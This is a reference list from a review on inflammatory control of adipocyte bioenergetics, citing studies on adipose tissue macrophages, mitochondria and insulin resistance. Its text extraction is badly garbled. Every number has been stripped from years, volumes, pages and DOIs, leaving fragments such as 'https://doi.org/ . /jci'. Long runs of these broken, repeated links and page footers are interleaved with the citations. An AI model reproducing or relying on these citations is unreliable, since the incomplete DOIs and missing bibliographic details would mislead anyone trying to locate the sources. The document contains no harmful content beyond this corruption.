sustain adaptive thermogenesis. nature – . (https://doi.org/ . / nature ) fischer k, ruiz hh, jhun k, finan b, oberlin dj, van der heide v, kalinovich av, petrovic n, wolf y, clemmensen c, et al. alternatively activated macrophages do not synthesize catecholamines or contribute to adipose tissue adaptive thermogenesis. nature medicine – . (https://doi.org/ . /nm. ) pirzgalska rm, seixas e, seidman js, link vm, sánchez nm, mahú i, mendes r, gres v, kubasova n, morris i, et al. sympathetic neuron- associated macrophages contribute to obesity by importing and metabolizing norepinephrine. nature medicine – . (https://doi.org/ . /nm. ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jci https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /j. - x. . .x https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /j.tem. . . https://doi.org/ . /db - https://doi.org/ . /febs. https://doi.org/ . /jc. - https://doi.org/ . /db - https://doi.org/ . /journal.pmed. https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . /db - https://doi.org/ . /science. https://doi.org/ . /science. https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . /nm https://doi.org/ . /ajpgi. . https://doi.org/ . /ajpgi. . https://doi.org/ . /jci https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /db - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /ajpendo. . https://doi.org/ . /db - https://doi.org/ . /jci https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . /nm. https://doi.org/ . /nm. https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : feng j, li l, ou z, li q, gong b, zhao z, qi w, zhou t, zhong j, cai w, et al. il- stimulates m macrophage polarization and thereby promotes mitochondrial respiratory capacity and lipolysis in adipose tissues against obesity. cellular and molecular immunology – . (https://doi.org/ . /cmi. . ) qian sw, wu my, wang yn, zhao yx, zou y, pan jb, tang y, liu y, guo l & tang qq. bmp facilitates beige fat biogenesis via regulating adipose tissue macrophages. journal of molecular cell biology – . (https://doi.org/ . /jmcb/mjy ) lee yh, kim sn, kwon hj, maddipati kr & granneman jg. adipogenic role of alternatively activated macrophages in β-adrenergic remodeling of white adipose tissue. american journal of physiology: regulatory, integrative and comparative physiology r –r . (https://doi.org/ . /ajpregu. . ) keuper m, sachs s, walheim e, berti l, raedle b, tews d, fischer- posovszky p, wabitsch m, hrabě de angelis m, kastenmüller g, et al. activated macrophages control human adipocyte mitochondrial bioenergetics via secreted factors. molecular metabolism – . (https://doi.org/ . /j.molmet. . . ) keuper m, blüher m, schön mr, möller p, dzyakanchuk a, amrein k, debatin km, wabitsch m & fischer-posovszky p. an inflammatory micro-environment promotes human adipocyte apoptosis. molecular and cellular endocrinology – . (https://doi. org/ . /j.mce. . . ) ehrlund a, acosta jr, björk c, hedén p, douagi i, arner p & laurencikiene j. the cell-type specific transcriptome in human adipose tissue and influence of obesity on adipocyte progenitors. scientific data . (https://doi.org/ . / sdata. . ) cancello r, henegar c, viguerie n, taleb s, poitou c, rouault c, coupaye m, pelloux v, hugol d, bouillot jl, et al. reduction of macrophage infiltration and chemoattractant gene expression changes in white adipose tissue of morbidly obese subjects after surgery-induced weight loss. diabetes – . (https:// doi.org/ . /diabetes. . . ) duffaut c, zakaroff-girard a, bourlier v, decaunes p, maumus m, chiotasso p, sengenès c, lafontan m, galitzky j & bouloumié a. interplay between human adipocytes and t lymphocytes in obesity: ccl as an adipochemokine and t lymphocytes as lipogenic modulators. arteriosclerosis, thrombosis, and vascular biology – . (https://doi.org/ . /atvbaha. . ) curat ca, miranville a, sengenès c, diehl m, tonus c, busse r & bouloumié a. from blood monocytes to adipose tissue- resident macrophages induction of diapedesis by human mature adipocytes. diabetes – . (https://doi.org/ . / diabetes. . . ) curat ca, wegner v, sengenès c, miranville a, tonus c, busse r & bouloumié a. macrophages in human visceral adipose tissue: increased accumulation in obesity and a source of resistin and visfatin. diabetologia – . (https://doi.org/ . / s - - -z) koppaka s, kehlenbrink s, carey m, li w, sanchez e, lee de, lee h, chen j, carrasco e, kishore p, et al. reduced adipose tissue macrophage content is associated with improved insulin sensitivity in thiazolidinedione-treated diabetic humans. diabetes – . (https://doi.org/ . /db - ) van harmelen v, skurk t, röhrig k, lee ym, halbleib m, aprath- husmann i & hauner h. effect of bmi and age on adipose tissue cellularity and differentiation capacity in women. international journal of obesity and related metabolic disorders – . (https://doi.org/ . /sj.ijo. ) zimmerlin l, donnenberg vs, pfeifer me, meyer em, péault b, rubin jp & donnenberg ad. stromal vascular progenitors in adult human adipose tissue. cytometry: part a – . (https://doi. org/ . /cyto.a. ) klar as, güven s, zimoch j, zapiórkowska na, biedermann t, böttcher-haberzeth s, meuli-simmen c, martin i, scherberich a, reichmann e, et al. characterization of vasculogenic potential of human adipose-derived endothelial cells in a three-dimensional vascularized skin substitute. pediatric surgery international – . (https://doi.org/ . /s - - - ) glastonbury ca, couto alves a, el-sayed moustafa j & small ks. cell-type heterogeneity in adipose tissue is associated with complex traits and reveals disease-relevant cell-specific eqtls. american journal of human genetics [epub]. (https://doi.org/ . /j. ajhg. . . ) travers rl, motta ac, betts ja, bouloumié a & thompson d. the impact of adiposity on adipose tissue-resident lymphocyte activation in humans. international journal of obesity – . (https:// doi.org/ . /ijo. . ) harman-boehm i, blüher m, redel h, sion-vardy n, ovadia s, avinoach e, shai i, klöting n, stumvoll m, bashan n, et al. macrophage infiltration into omental versus subcutaneous fat across different populations: effect of regional adiposity and the comorbidities of obesity. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) bruun jm, lihn as, pedersen sb & richelsen b. monocyte chemoattractant protein- release is higher in visceral than subcutaneous human adipose tissue (at): implication of macrophages resident in the at. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) cancello r, tordjman j, poitou c, guilhem g, bouillot jl, hugol d, coussieu c, basdevant a, hen ab, bedossa p, et al. increased infiltration of macrophages in omental adipose tissue is associated with marked hepatic lesions in morbid human obesity. diabetes – . (https://doi.org/ . /db - ) spencer m, yao-borengasser a, unal r, rasouli n, gurley cm, zhu b, peterson ca & kern pa. adipose tissue macrophages in insulin- resistant subjects are associated with collagen vi and fibrosis and demonstrate alternative activation. american journal of physiology: endocrinology and metabolism e –e . (https://doi. org/ . /ajpendo. . ) blaszczak am, jalilvand a, liu j, wright vp, suzo a, needleman b, noria s, lafuse w, hsueh wa & bradley d. human visceral adipose tissue macrophages are not adequately defined by standard methods of characterization. journal of diabetes research – . (https://doi.org/ . / / ) laparra a, tricot s, le van m, damouche a, gorwood j, vaslin b, favier b, benoist s, ho tsong fang r, bosquet n, et al. the frequencies of immunosuppressive cells in adipose tissue differ in human, non-human primate, and mouse models. frontiers in immunology . (https://doi.org/ . / fimmu. . ) renovato-martins m, matheus me, de andrade ir, moraes ja, da silva sv, citelli dos reis m, de souza aap, da silva cc, bouskela e & barja-fidalgo c. microparticles derived from obese adipose tissue elicit a pro-inflammatory phenotype of cd +, ccr + and tlr + monocytes. biochimica et biophysica acta (bba): molecular basis of disease – . (https://doi.org/ . /j. bbadis. . . ) weisberg sp, hunter d, huber r, lemieux j, slaymaker s, vaddi k, charo i, leibel rl & ferrante aw. ccr modulates inflammatory and metabolic effects of high-fat feeding. journal of clinical investigation – . (https://doi.org/ . /jci ) kanda h, tateya s, tamori y, kotani k, hiasa k, kitazawa r, kitazawa s, miyachi h, maeda s, egashira k, et al. mcp- contributes to macrophage infiltration into adipose tissue, insulin resistance, and hepatic steatosis in obesity. journal of clinical investigation – . (https://doi.org/ . /jci ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /cmi. . https://doi.org/ . /jmcb/mjy https://doi.org/ . /ajpregu. . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /sdata. . https://doi.org/ . /sdata. . https://doi.org/ . /diabetes. . . https://doi.org/ . /diabetes. . . https://doi.org/ . /atvbaha. . https://doi.org/ . /diabetes. . . https://doi.org/ . /diabetes. . . https://doi.org/ . /s - - -z https://doi.org/ . /s - - -z https://doi.org/ . /db - https://doi.org/ . /sj.ijo. https://doi.org/ . /cyto.a. https://doi.org/ . /cyto.a. https://doi.org/ . /s - - - https://doi.org/ . /j.ajhg. . . https://doi.org/ . /j.ajhg. . . https://doi.org/ . /ijo. . https://doi.org/ . /ijo. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /db - https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . / / https://doi.org/ . /fimmu. . https://doi.org/ . /fimmu. . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /jci https://doi.org/ . /jci https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : cinti s, mitchell g, barbatelli g, murano i, ceresi e, faloia e, wang s, fortier m, greenberg as & obin ms. adipocyte death defines macrophage localization and function in adipose tissue of obese mice and humans. journal of lipid research – . (https://doi.org/ . /jlr.m -jlr ) lumeng cn, deyoung sm, bodzin jl & saltiel ar. increased inflammatory properties of adipose tissue macrophages recruited during diet-induced obesity. diabetes – . (https://doi. org/ . /db - ) nguyen mta, favelyukis s, nguyen ak, reichart d, scott pa, jenn a, liu-bryan r, glass ck, neels jg & olefsky jm. a subpopulation of macrophages infiltrates hypertrophic adipose tissue and is activated by free fatty acids via toll-like receptors and and jnk-dependent pathways. journal of biological chemistry – . (https://doi.org/ . /jbc.m ) oh dy, morinaga h, talukdar s, bae ej & olefsky jm. increased macrophage migration into adipose tissue in obese mice. diabetes – . (https://doi.org/ . /db - ) amano su, cohen jl, vangala p, tencerova m, nicoloro sm, yawe jc, shen y, czech mp & aouadi m. local proliferation of macrophages contributes to obesity-associated adipose tissue inflammation. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) braune j, weyer u, hobusch c, mauer j, brüning jc, bechmann i & gericke m. il- regulates m polarization and local proliferation of adipose tissue macrophages in obesity. journal of immunology – . (https://doi.org/ . /jimmunol. ) ramkhelawon b, hennessy ej, ménager m, ray td, sheedy fj, hutchison s, wanschel a, oldebeken s, geoffrion m, spiro w, et al. netrin- promotes adipose tissue macrophage retention and insulin resistance in obesity. nature medicine – . (https://doi. org/ . /nm. ) brestoff jr, kim bs, saenz sa, stine rr, monticelli la, sonnenberg gf, thome jj, farber dl, lutfy k, seale p, et al. group innate lymphoid cells promote beiging of white adipose tissue and limit obesity. nature – . (https://doi.org/ . / nature ) liu ps, lin yw, burton fh & wei ln. injecting engineered anti- inflammatory macrophages therapeutically induces white adipose tissue browning and improves diet-induced insulin resistance. adipocyte – . (https://doi.org/ . / . . ) kosteli a, sugaru e, haemmerle g, martin jf, lei j, zechner r & ferrante aw. weight loss and lipolysis promote a dynamic immune response in murine adipose tissue. journal of clinical investigation – . (https://doi.org/ . /jci ) fitzgibbons tp & czech mp. emerging evidence for beneficial macrophage functions in atherosclerosis and obesity-induced insulin resistance. journal of molecular medicine – . (https:// doi.org/ . /s - - - ) xu x, grijalva a, van skowronski a, van eijk m, serlie mj & ferrante aw. obesity activates a program of lysosomal-dependent lipid metabolism in adipose tissue macrophages independently of classic activation. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) satoh t, kidoya h, naito h, yamamoto m, takemura n, nakagawa k, yoshioka y, morii e, takakura n, takeuchi o, et al. critical role of trib in differentiation of tissue-resident m -like macrophages. nature – . (https://doi.org/ . /nature ) wu d, molofsky ab, liang he, ricardo-gonzalez rr, jouihan ha, bando jk, chawla a & locksley rm. eosinophils sustain adipose alternatively activated macrophages associated with glucose homeostasis. science – . (https://doi.org/ . / science. ) lee mw, odegaard ji, mukundan l, qiu y, molofsky ab, nussbaum jc, yun k, locksley rm & chawla a. activated type innate lymphoid cells regulate beige fat biogenesis. cell – . (https://doi.org/ . /j.cell. . . ) lumeng cn, bodzin jl & saltiel ar. obesity induces a phenotypic switch in adipose tissue macrophage polarization. journal of clinical investigation – . (https://doi.org/ . / jci ) boutagy ne, mcmillan rp, frisard mi & hulver mw. metabolic endotoxemia with obesity: is it real and is it relevant? biochimie – . (https://doi.org/ . /j.biochi. . . ) murray pj, allen je, biswas sk, fisher ea, gilroy dw, goerdt s, gordon s, hamilton ja, ivashkiv lb, lawrence t, et al. macrophage activation and polarization: nomenclature and experimental guidelines. immunity – . (https://doi.org/ . /j. immuni. . . ) thomas ac & mattila jt. ‘of mice and men’: arginine metabolism in macrophages. frontiers in immunology . (https://doi. org/ . /fimmu. . ) raes g, den bergh rv, baetselier pd & ghassabeh gh. arginase- and ym are markers for murine, but not human, alternatively activated myeloid cells. journal of immunology – . (https:// doi.org/ . /jimmunol. . . ) schneemann m & schoeden g. macrophage biology and immunology: man is not a mouse. journal of leukocyte biology – . (https://doi.org/ . /jlb. ) gross tj, kremens k, powers ls, brink b, knutson t, domann fe, philibert ra, milhem mm & monick mm. epigenetic silencing of the human nos gene: rethinking the role of nitric oxide in human macrophage inflammatory responses. journal of immunology – . (https://doi.org/ . /jimmunol. ) fjeldborg k, pedersen sb, møller hj, christiansen t, bennetzen m & richelsen b. human adipose tissue macrophages are enhanced but changed to an anti-inflammatory profile in obesity. journal of immunology research – . (https://doi. org/ . / / ) li p, lu m, nguyen mta, bae ej, chapman j, feng d, hawkins m, pessin je, sears dd, nguyen ak, et al. functional heterogeneity of cd c-positive adipose tissue macrophages in diet-induced obese mice. journal of biological chemistry – . (https:// doi.org/ . /jbc.m . ) wentworth jm, naselli g, brown wa, doyle l, phipson b, smyth gk, wabitsch m, o’brien pe & harrison lc. pro-inflammatory cd c+cd + adipose tissue macrophages are associated with insulin resistance in human obesity. diabetes – . (https://doi.org/ . /db - ) nakajima s, koh v, kua lf, so j, davide l, lim ks, petersen sh, yong wp, shabbir a & kono k. accumulation of cd c+cd + adipose tissue macrophages through upregulation of intracellular β-hsd in human obesity. journal of immunology – . (https://doi.org/ . /jimmunol. : ) zeyda m, farmer d, todoric j, aszmann o, speiser m, györi g, zlabinger gj & stulnig tm. human adipose tissue macrophages are of an anti-inflammatory phenotype but capable of excessive pro- inflammatory mediator production. international journal of obesity – . (https://doi.org/ . /sj.ijo. ) kratz m, coats br, hisert kb, hagman d, mutskov v, peris e, schoenfelt kq, kuzma jn, larson i, billing ps, et al. metabolic dysfunction drives a mechanistically distinct proinflammatory phenotype in adipose tissue macrophages. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) fassina g, dorigo p, badetti r & visco l. effect of oxidative phosphorylation inhibitors on cyclic adenosine monophosphate synthesis in rat adipose tissue. biochemical pharmacology – . (https://doi.org/ . / - ( ) - ) demine s, tejerina s, bihin b, thiry m, reddy n, renard p, raes m, jadot m & arnould t. mild mitochondrial uncoupling induces hsl/ atgl-independent lipolysis relying on a form of autophagy in t - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jlr.m -jlr https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /jbc.m https://doi.org/ . /db - https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /jimmunol. https://doi.org/ . /nm. https://doi.org/ . /nm. https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /jci https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /nature https://doi.org/ . /science. https://doi.org/ . /science. https://doi.org/ . /j.cell. . . https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . /j.biochi. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /fimmu. . https://doi.org/ . /fimmu. . https://doi.org/ . /jimmunol. . . https://doi.org/ . /jimmunol. . . https://doi.org/ . /jlb. https://doi.org/ . /jimmunol. https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /jbc.m . https://doi.org/ . /jbc.m . https://doi.org/ . /db - https://doi.org/ . /jimmunol. https://doi.org/ . /sj.ijo. https://doi.org/ . /j.cmet. . . https://doi.org/ . / - ( ) - https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : l adipocytes. journal of cellular physiology – . (https://doi.org/ . /jcp. ) maassen ja, romijn ja & heine rj. fatty acid-induced mitochondrial uncoupling in adipocytes as a key protective factor against insulin resistance and beta cell dysfunction: a new concept in the pathogenesis of obesity-associated type diabetes mellitus. diabetologia – . (https://doi.org/ . /s - - -z) contreras l, drago i, zampese e & pozzan t. mitochondria: the calcium connection. biochimica et biophysica acta – . (https://doi.org/ . /j.bbabio. . . ) pershadsingh ha, shade dl, delfert dm & mcdonald jm. chelation of intracellular calcium blocks insulin action in the adipocyte. pnas – . (https://doi.org/ . /pnas. . . ) wang y, ali y, lim cy, hong w, pang zp & han w. insulin- stimulated leptin secretion requires calcium and pi k/akt activation. biochemical journal – . (https://doi.org/ . / bj ) wang ch, chen yf, wu cy, wu pc, huang yl, kao ch, lin ch, kao ls, tsai tf & wei yh. cisd modulates the differentiation and functioning of adipocytes by regulating intracellular ca + homeostasis. human molecular genetics – . (https:// doi.org/ . /hmg/ddu ) shi h, halvorsen yd, ellis pn, wilkison wo & zemel mb. role of intracellular calcium in human adipocyte differentiation. physiological genomics – . (https://doi.org/ . / physiolgenomics. . . . ) wright le, vecellio reane d, milan g, terrin a, di bello g, belligoli a, sanna m, foletto m, favaretto f, raffaello a, et al. increased mitochondrial calcium uniporter in adipocytes underlies mitochondrial alterations associated with insulin resistance. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) tormos kv, anso e, hamanaka rb, eisenbart j, joseph j, kalyanaraman b & chandel ns. mitochondrial complex iii ros regulate adipocyte differentiation. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) zhang y, marsboom g, toth pt & rehman j. mitochondrial respiration regulates adipogenic differentiation of human mesenchymal stem cells. plos one e . (https://doi. org/ . /journal.pone. ) keuper m, jastroch m, yi cx, fischer-posovszky p, wabitsch m, tschop mh & hofmann sm. spare mitochondrial respiratory capacity permits human adipocytes to maintain atp homeostasis under hypoglycemic conditions. faseb journal – . (https://doi.org/ . /fj. - ) wilson-fritch l, burkart a, bell g, mendelson k, leszyk j, nicoloro s, czech m & corvera s. mitochondrial biogenesis and remodeling during adipogenesis and in response to the insulin sensitizer rosiglitazone. molecular and cellular biology – . (https://doi.org/ . /mcb. . . - . ) böttcher h & fürst p. microcalorimetric and biochemical investigations of thermogenesis and metabolic pathways in human white adipocytes. international journal of obesity and related metabolic disorders – . von heimburg dv, hemmrich k, zachariah s, staiger h & pallua n. oxygen consumption in undifferentiated versus differentiated adipogenic mesenchymal precursor cells. respiratory physiology and neurobiology – . (https://doi.org/ . /j. resp. . . ) kraunsøe r, boushel r, hansen cn, schjerling p, qvortrup k, støckel m, mikines kj & dela f. mitochondrial respiration in subcutaneous and visceral adipose tissue from patients with morbid obesity. journal of physiology – . (https://doi. org/ . /jphysiol. . ) schöttl t, kappler l, braun k, fromme t & klingenspor m. limited mitochondrial capacity of visceral versus subcutaneous white adipocytes in male c bl/ n mice. endocrinology – . (https://doi.org/ . /en. - ) krief s, lönnqvist f, raimbault s, baude b, van spronsen a, arner p, strosberg ad, ricquier d & emorine lj. tissue distribution of beta -adrenergic receptor mrna in man. journal of clinical investigation – . (https://doi.org/ . /jci ) villaret a, galitzky j, decaunes p, estève d, marques ma, sengenès c, chiotasso p, tchkonia t, lafontan m, kirkland jl, et al. adipose tissue endothelial cells from obese human subjects: differences among depots in angiogenic, metabolic, and inflammatory gene expression and cellular senescence. diabetes – . (https://doi.org/ . /db - ) vatier c, kadiri s, muscat a, chapron c, capeau j & antoine b. visceral and subcutaneous adipose tissue from lean women respond differently to lipopolysaccharide-induced alteration of inflammation and glyceroneogenesis. nutrition and diabetes e . (https:// doi.org/ . /nutd. . ) keuper m, berti l, raedle b, sachs s, böhm a, fritsche l, fritsche a, häring hu, hrabě de angelis m, jastroch m, et al. preadipocytes of obese humans display gender-specific bioenergetic responses to glucose and insulin. molecular metabolism – . (https:// doi.org/ . /j.molmet. . . ) campbell pj, carlson mg, hill jo & nurjhan n. regulation of free fatty acid metabolism by insulin in humans: role of lipolysis and reesterification. american journal of physiology e –e . (https://doi.org/ . /ajpendo. . . .e ) reshef l, olswang y, cassuto h, blum b, croniger cm, kalhan sc, tilghman sm & hanson rw. glyceroneogenesis and the triglyceride/ fatty acid cycle. journal of biological chemistry – . (https://doi.org/ . /jbc.r ) flachs p, rossmeisl m, kuda o & kopecky j. stimulation of mitochondrial oxidative capacity in white fat independent of ucp : a key to lean phenotype. biochimica et biophysica acta – . (https://doi.org/ . /j.bbalip. . . ) guilherme a, virbasius jv, puri v & czech mp. adipocyte dysfunctions linking obesity to insulin resistance and type diabetes. nature reviews: molecular cell biology – . (https://doi.org/ . /nrm ) wilson-fritch l, nicoloro s, chouinard m, lazar ma, chui pc, leszyk j, straubhaar j, czech mp & corvera s. mitochondrial remodeling in adipose tissue associated with obesity and treatment with rosiglitazone. journal of clinical investigation – . (https://doi.org/ . /jci ) yeo cr, agrawal m, hoon s, shabbir a, shrivastava mk, huang s, khoo cm, chhay v, yassin ms, tai es, et al. sgbs cells as a model of human adipocyte browning: a comprehensive comparative study with primary human white subcutaneous adipocytes. scientific reports . (https://doi.org/ . /s - - - ) sörbris r, nilsson-ehle p, monti m & wadsö i. differences in heat production between adipocytes from obese and normal weight individuals. febs letters – . (https://doi. org/ . / - ( ) -x) digirolamo m, newby fd & lovejoy j. lactate production in adipose tissue: a regulated function with extra-adipose implications. faseb journal – . (https://doi.org/ . / fasebj. . . ) van der merwe mt, schlaphoff gp, crowther nj, boyd ih, gray ip, joffe bi & lönnroth pn. lactate and glycerol release from adipose tissue in lean, obese, and diabetic women from south africa. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jcem. . . ) simoneau ja & kelley de. altered glycolytic and oxidative capacities of skeletal muscle contribute to insulin resistance in niddm. journal this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jcp. https://doi.org/ . /s - - -z https://doi.org/ . /s - - -z https://doi.org/ . /j.bbabio. . . https://doi.org/ . /pnas. . . https://doi.org/ . /bj https://doi.org/ . /bj https://doi.org/ . /hmg/ddu https://doi.org/ . /hmg/ddu https://doi.org/ . /physiolgenomics. . . . https://doi.org/ . /physiolgenomics. . . . https://doi.org/ . /ajpendo. . https://doi.org/ . /j.cmet. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /fj. - https://doi.org/ . /mcb. . . - . https://doi.org/ . /j.resp. . . https://doi.org/ . /j.resp. . . https://doi.org/ . /jphysiol. . https://doi.org/ . /jphysiol. . https://doi.org/ . /en. - https://doi.org/ . /jci https://doi.org/ . /db - https://doi.org/ . /nutd. . https://doi.org/ . /nutd. . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /ajpendo. . . .e https://doi.org/ . /jbc.r https://doi.org/ . /j.bbalip. . . https://doi.org/ . /nrm https://doi.org/ . /jci https://doi.org/ . /s - - - https://doi.org/ . / - ( ) -x https://doi.org/ . / - ( ) -x https://doi.org/ . /fasebj. . . https://doi.org/ . /fasebj. . . https://doi.org/ . /jcem. . . https://doi.org/ . /jcem. . . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : of applied physiology – . (https://doi.org/ . / jappl. . . . ) ceperuelo-mallafré v, ejarque m, serena c, duran x, montori- grau m, rodríguez ma, yanes o, núñez-roa c, roche k, puthanveetil p, et al. adipose tissue glycogen accumulation is associated with obesity-linked inflammation in humans. molecular metabolism – . (https://doi.org/ . /j. molmet. . . ) si y, palani s, jayaraman a & lee k. effects of forced uncoupling protein expression in t -l cells on mitochondrial function and lipid metabolism. journal of lipid research – . (https:// doi.org/ . /jlr.m -jlr ) si y, shi h & lee k. metabolic flux analysis of mitochondrial uncoupling in t -l adipocytes. plos one e . (https:// doi.org/ . /journal.pone. ) mitrou p, boutati e, lambadiari v, maratou e, papakonstantinou a, komesidou v, sidossis l, tountas n, katsilambros n, economopoulos t, et al. rates of glucose uptake in adipose tissue and muscle in vivo after a mixed meal in women with morbid obesity. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) tejerina s, de pauw a, vankoningsloo s, houbion a, renard p, de longueville f, raes m & arnould t. mild mitochondrial uncoupling induces t -l adipocyte de-differentiation by a ppar-independent mechanism, whereas tnf-induced de-differentiation is ppar dependent. journal of cell science – . (https://doi. org/ . /jcs. ) stefan n, kantartzis k, machann j, schick f, thamer c, rittig k, balletshofer b, machicao f, fritsche a & häring hu. identification and characterization of metabolically benign obesity in humans. archives of internal medicine – . (https://doi. org/ . /archinte. . . ) klöting n, fasshauer m, dietrich a, kovacs p, schön mr, kern m, stumvoll m & blüher m. insulin-sensitive obesity. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) phillips cm & perry ij. does inflammation determine metabolic health status in obese and nonobese adults? journal of clinical endocrinology and metabolism e –e . (https://doi. org/ . /jc. - ) wildman rp, kaplan r, manson je, rajkovic a, connelly sa, mackey rh, tinker lf, curb jd, eaton cb & wassertheil‐smoller s. body size phenotypes and inflammation in the women’s health initiative observational study. obesity – . (https:// doi.org/ . /oby. . ) karelis ad, faraj m, bastard jp, st-pierre dh, brochu m, prud’homme d & rabasa-lhoret r. the metabolically healthy but obese individual presents a favorable inflammation profile. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) zhang hh, halbleib m, ahmad f, manganiello vc & greenberg as. tumor necrosis factor-alpha stimulates lipolysis in differentiated human adipocytes through activation of extracellular signal- related kinase and elevation of intracellular camp. diabetes – (https://doi.org/ . /diabetes. . . ) gao d, madi m, ding c, fok m, steele t, ford c, hunter l & bing c. interleukin- β mediates macrophage-induced impairment of insulin signaling in human primary adipocytes. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) van hall g, steensberg a, sacchetti m, fischer c, keller c, schjerling p, hiscock n, møller k, saltin b, febbraio ma, et al. interleukin- stimulates lipolysis and fat oxidation in humans. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) hotamisligil gs, murray dl, choy ln & spiegelman bm. tumor necrosis factor alpha inhibits signaling from the insulin receptor. pnas – . (https://doi.org/ . / pnas. . . ) xie x, sinha s, yi z, langlais pr, madan m, bowen bp, willis w & meyer c. role of adipocyte mitochondria in inflammation, lipemia and insulin sensitivity in humans: effects of pioglitazone treatment. international journal of obesity – . (https://doi. org/ . /ijo. . ) ohashi k, parker jl, ouchi n, higuchi a, vita ja, gokce n, pedersen aa, kalthoff c, tullin s, sams a, et al. adiponectin promotes macrophage polarization toward an anti-inflammatory phenotype. journal of biological chemistry – . (https://doi.org/ . /jbc.m . ) maya-monteiro cm, almeida pe, d’avila h, martins as, rezende ap, castro-faria-neto h & bozza pt. leptin induces macrophage lipid body formation by a phosphatidylinositol -kinase- and mammalian target of rapamycin-dependent mechanism. journal of biological chemistry – . (https://doi.org/ . /jbc. m ) tang l, okamoto s, shiuchi t, toda c, takagi k, sato t, saito k, yokota s & minokoshi y. sympathetic nerve activity maintains an anti-inflammatory state in adipose tissue in male mice by inhibiting tnf-α gene expression in macrophages. endocrinology – . (https://doi.org/ . /en. - ) lumeng cn, deyoung sm & saltiel ar. macrophages block insulin action in adipocytes by altering expression of signaling and glucose transport proteins. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . / ajpendo. . ) keuper m, dzyakanchuk a, amrein ke, wabitsch m & fischer- posovszky p. thp- macrophages and sgbs adipocytes – a new human in vitro model system of inflamed adipose tissue. frontiers in endocrinology . (https://doi.org/ . /fendo. . ) stouthard jml, oude elferink rpj & sauerwein hp. interleukin- enhances glucose transport in t -l adipocytes. biochemical and biophysical research communications – . (https://doi. org/ . /bbrc. . ) jager j, grémeaux t, cormont m, le marchand-brustel y & tanti jf. interleukin- beta-induced insulin resistance in adipocytes through down-regulation of insulin receptor substrate- expression. endocrinology – . (https://doi.org/ . /en. - ) sartipy p & loskutoff dj. monocyte chemoattractant protein in obesity and insulin resistance. pnas – . (https:// doi.org/ . 